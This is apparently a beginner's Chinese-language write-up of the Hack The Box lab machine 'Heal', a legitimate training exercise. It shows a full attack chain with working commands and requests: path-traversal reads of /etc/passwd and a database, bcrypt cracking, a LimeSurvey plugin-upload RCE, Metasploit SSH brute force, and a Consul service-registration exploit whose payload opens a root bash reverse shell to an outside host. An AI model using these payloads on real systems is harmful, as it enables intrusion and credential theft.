[HTB] 靶机学习(一)Heal
[HTB] 靶机学习(一)Heal
概要
学习hackthebox的第一天,本人为初学者,将以初学者的角度对靶机渗透进行学习,中途可能会插入一些跟实操关系不大的相关新概念的学习和解释,尽量做到详细,不跳步,所以也会有理解不正确的地方,欢迎大佬们提出指正
信息收集
端口扫描
由于可能是网络问题,扫描全端口很慢,所以用-F扫描top100端口,-sC表示使用nmap默认脚本扫描,-sV表示探测服务版本信息
nmap -sC -sV -F 10.10.11.46
Starting Nmap 7.94 ( https://nmap.org ) at 2025-05-01 11:05 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.11.46
Host is up (3.5s latency).
Not shown: 95 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA)
|_ 256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519)
25/tcp open tcpwrapped
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://heal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
110/tcp open tcpwrapped
514/tcp filtered shell
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
可以看到,开放了22,25,80,110,514端口
先看看80端口的,注意到标题Did not follow redirect to http://heal.htb/,无法重定向,所以先改一下hosts文件并访问网站
子域名爆破
模糊测试HOST头部,匹配200状态码
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200 -u http://heal.htb -H "Host: FUZZ.heal.htb"
-w:设置字典
-mc:匹配http状态码
-H:匹配http头部
发现api.heal.htb子域名
添加子域名并访问网站
echo '10.10.11.46 api.heal.htb' >> /etc/hosts
目录爆破
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt -u http://heal.htb -t 50
发现survey路由,访问http://heal.htb/survey
点击参与调查,跳转到新的子域名http://take-survey.heal.htb,显示无法使用此页面,需要添加到hosts文件
得到用户名ralph
子域名目录爆破
dirsearch -u "http://take-survey.heal.htb/index.php/" -i 200,302
因为503太多了,选择-i 只匹配200,302
有多个302跳转,访问http://take-survey.heal.htb/index.php/admin/authentication/sa/login
差不多收集完了,从头开始看看
漏洞利用
目录遍历
回到http://heal.htb,注册一个看看,随便填
注册完划到最下面
点击导出pdf,抓包
放行到第三个包
发现了filename参数,试试能不能利用目录遍历来读取敏感文件
GET /download?filename=../../../../../etc/passwd
找到两个/bin/bash登录用户,ralph和ron
再看看第一个获取到的子域名http://api.heal.htb
看看ruby by rails有没有什么敏感文件,然后利用目录遍历读取出来,经过搜索,发现有数据库相关的配置文件
依旧是尝试一个个添加../
GET /download?filename=../../config/database.yml
发现了数据库文件,读取看看
GET /download?filename=../../storage/development.sqlite3 HTTP/1.1
哈希爆破
$2a$开头,为bcrypt类型的hash,所以指定-m 3200
hashcat -m 3200 '$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG' /usr/share/wordlists/rockyou.txt
得到明文147258369
$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG:147258369
Session..........: hashcat
Status...........: Cracked
尝试ssh登录,密码错误,看来不是用来登录ssh的密码
└─# ssh ralph@10.10.11.46
回想到刚才有个登录界面,用ralph/147258369登录看看,语言选择中文
http://take-survey.heal.htb/index.php/admin/authentication/sa/login
limesurvey 6.6.4 rce
(https://github.com/N4s1rl1/Limesurvey-6.6.4-RCE)
下载上述网址的zip
修改revshell.php的ip和端口,我的是kali的ip
将修改后的revshell.php和config.xml打包成zip
选择配置-》插件
选择上传并安装,上传刚刚的zip文件
上传zip
选择安装
可以在第二页看到我们刚刚安装的插件
激活插件
得到插件的id是21
修改插件id
python exploit.py http://take-survey.heal.htb ralph 147258369 80
在kali上反弹shell成功
升级为交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data权限还是比较低的,看看有没有什么敏感文件,比如数据库文件,网站配置文件等
find /var/www/ -type f -name '*config*' 2>/dev/null -print0 | xargs -0 grep -i 'pass'
find /var/www/ -type f -name '*config*':找到/var/www目录的文件名中带有config的普通文件
2>/dev/null:错误重定向,隐藏错误输出
-print0:每个匹配的文件用 null 字符(\0) 结尾输出,用于防止文件名中含有空格、换行、特殊字符造成问题。
xargs:接收前面 find 命令输出的文件路径,并一批一批地传递给下一个命令(即 grep)执行。
-0:告诉 xargs 以 null 字符(而不是空格或换行)分隔输入,与 -print0 配合,防止路径中有空格出错。
grep -i:不区分大小写,逐行查找关键字
找到一个密码AdmiDi0_pA$$w0rd
将收集到的密码写到pass,用户名写到user
ssh爆破
使用msf爆破ssh
msfconsole
set RHOSTS 10.10.11.46
set PASS_FILE /root/pass
set USER_FILE /root/user
run
得到用户名和密码ron:AdmiDi0_pA$$w0rd,ssh登录得到第一个flag
权限提升
ssh端口转发
查看端口开放
ss -tuln
由于虚拟机网络问题,抽风了,连接很慢,且都是在127.0.0.1上的内网服务,正常是无法访问的,需要端口转发,改用本机的mobaxterm进行端口转发,经过尝试,3000是最开始的heal.htb,其他端口没什么有用的,基本没有实际服务,只有8500端口看起来比较有用,
打开mobaxterm内置的终端
ssh -L 8500:127.0.0.1:8500 ron@heal.htb
冒号前面是本地端口,冒号后面是远程服务器的端口,也就是10.10.11.46上的内网服务
ssh -L :本地端口转发,用ssh连接建立ssh隧道,当访问本地的8500端口时,通过ssh隧道转发到heal.htb上的8500端口,相当于本地通过ssh隧道访问heal.htb的内网服务
本机访问http://127.0.01:8500,找到了版本号Consul v1.19.2,查一下有没有漏洞
Hashicorp Consul v1.0 RCE
发现有rce漏洞
参考https://blog.csdn.net/lhh134/article/details/135673444
访问http://127.0.0.1:8500/v1/agent/self
查找EnableRemoteScriptChecks,为true,大概是有漏洞的
poc似乎有点问题,Request decode failed: json: unknown field "script"
后来又找到另一个
https://www.exploit-db.com/exploits/51117
发现这里没有写script键值对,删除试试,回显200,接着访问http://127.0.0.1:8500/ui/server1/nodes/consul-01/health-checks,发现是root用户
PUT /v1/agent/service/register HTTP/1.1
Host: 127.0.0.1:8500
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token:
Content-type: application/json
Connection: close
Content-Length: 246
{
"ID": "bpPeMfZuAN",
"Name": "bpPeMfZuAN",
"Address":"127.0.0.1",
"Port":80,
"check":{
"Args": ["sh", "-c","whoami"],
"interval":"10s",
"Timeout":"86400s"
}
}
反弹shell(root)
PUT /v1/agent/service/register HTTP/1.1
Host: 127.0.0.1:8500
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token:
Content-type: application/json
Connection: close
Content-Length: 295
{
"ID": "bpPeMfZuAN",
"Name": "bpPeMfZuAN",
"Address":"127.0.0.1",
"Port":80,
"check":{
"Args": ["/bin/bash", "-c","/bin/bash -i >& /dev/tcp/10.10.14.29/1234 0>&1"],
"interval":"10s",
"Timeout":"86400s"
}
}
先在kali监听1234端口,发送请求包
在root目录的root.txt找到第二个flag
[HTB] 靶机学习(一)Heal的更多相关文章
- LKWA靶机学习
LKWA靶机学习 目录 LKWA靶机学习 1 下载地址 2 Blind RCE 2.1 利用Burpsuite Collaborato模块来查看输出. 2.2 尝试利用dnslog进行回显 3 XSS ...
- Vulnhub-XXE靶机学习
------------恢复内容开始------------ 前两天在微信公众号上看见了这个XXE靶场,就想试一试,虽然网上关于这个的文章已经写了太多太多了,但还是要写出来划划水,233333333, ...
- DC-2靶机
DC-2 靶机获取:http://www.five86.com/ 靶机IP:192.168.43.197(arp-scan l) 攻击机器IP:192.168.43.199 在hosts文件里添加:1 ...
- 21. 从一道CTF靶机来学习mysql-udf提权
这次测试的靶机为 Raven: 2 这里是CTF解题视频地址:https://www.youtube.com/watch?v=KbUUn3SDqaU 此次靶机主要学习 PHPMailer 跟 mymq ...
- Vulnhub DC-1靶机渗透学习
前言 之前听说过这个叫Vulnhub DC-1的靶机,所以想拿来玩玩学习,结果整个过程都是看着别人的writeup走下来的,学艺不精,不过这个过程也认识到,学会了很多东西. 所以才想写点东西,记录一下 ...
- 【HTB系列】靶机Frolic的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台.它能帮助你提升渗透测 ...
- 【HTB系列】靶机Access的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台.它能帮助你提升渗透测 ...
- 【HTB系列】靶机Chaos的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) 知识点: 通过域名或者IP可能会得到网站的不同响应 Wpscan的扫描wordpress ...
- 【HTB系列】靶机Querier的渗透测试
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) 总结与反思: 1.收集信息要全面 2.用snmp-check检查snmp目标是否开启服务 ...
- 【HTB系列】靶机Netmon的渗透测试
出品|MS08067实验室(www.ms08067.com) 本文作者:是大方子(Ms08067实验室核心成员) 总结和反思: win中执行powershell的远程代码下载执行注意双引号转义 对po ...
随机推荐
- DeepSeek-R1本地部署如何选择适合你的版本?看这里
DeepSeek-R1本地部署:选择最适合你的版本,轻松搞定! 关于本地部署DeepSeek-R1前期知识 如果你正在考虑将DeepSeek-R1部署到本地服务器上,了解每种类型的硬件需求是非常重要的 ...
- RabbitMQ(八)——消息确认
RabbitMQ系列 RabbitMQ(一)--简介 RabbitMQ(二)--模式类型 RabbitMQ(三)--简单模式 RabbitMQ(四)--工作队列模式 RabbitMQ(五)--发布订阅 ...
- 无分类无tag
1 2 3
- 2024电子取证“獬豸杯”WP
简介: 竞赛为个人赛,工具自备,只发证书(还没用,公告这么写的哈)竞赛选手们将对模拟的案件进行电子数据调查取证,全面检验参赛选手电子数据取证的综合素质和能力. 检材链接: https://pan.ba ...
- c++常量引用,通过被引用变量修改数据无法同步到引用
正常情况下被引用的对象改变,常量引用的值也跟着改变.i和j是同一个对象,所以是同步的: int i = 42; const int& j = i; i = 43; cout << ...
- CUDA时长统计
技术背景 前面的一篇文章中介绍了在CUDA中使用宏来监测CUDA C函数或者Kernel函数的运行报错问题.同样的思路,我们可用写一个用于统计函数运行时长的宏,这样不需要使用额外的工具来对函数体的性能 ...
- 在OCI上快速静默安装23ai数据库
拿到同事帮忙申请好的OCI环境[OEL 8.10]后,开始安装23ai数据库用于后续测试,本文选择快速静默安装模式. OCI环境都是opc用户登录的,执行高权限的操作均需要用到sudo命令. 首先创建 ...
- Forest v1.5.13 发布,声明式 HTTP 框架,已超 1.8k star
Forest介绍 Forest 是一个开源的 Java HTTP 客户端框架,它能够将 HTTP 的所有请求信息(包括 URL.Header 以及 Body 等信息)绑定到您自定义的 Interfac ...
- Windows 提权-MSSQL
本文通过 Google 翻译 MSSQL – Windows Privilege Escalation 这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充. 导航 0 前言 ...
- Oracle 23ai TPC-H 执行情况
TPC-H是一个广泛使用的基准测试,用于评估数据库系统在决策支持系统(DSS)场景下的性能. 在昨天的文章中,我们完成了<Oracle 23ai TPC-H 测试环境部署>,本文将继续记录 ...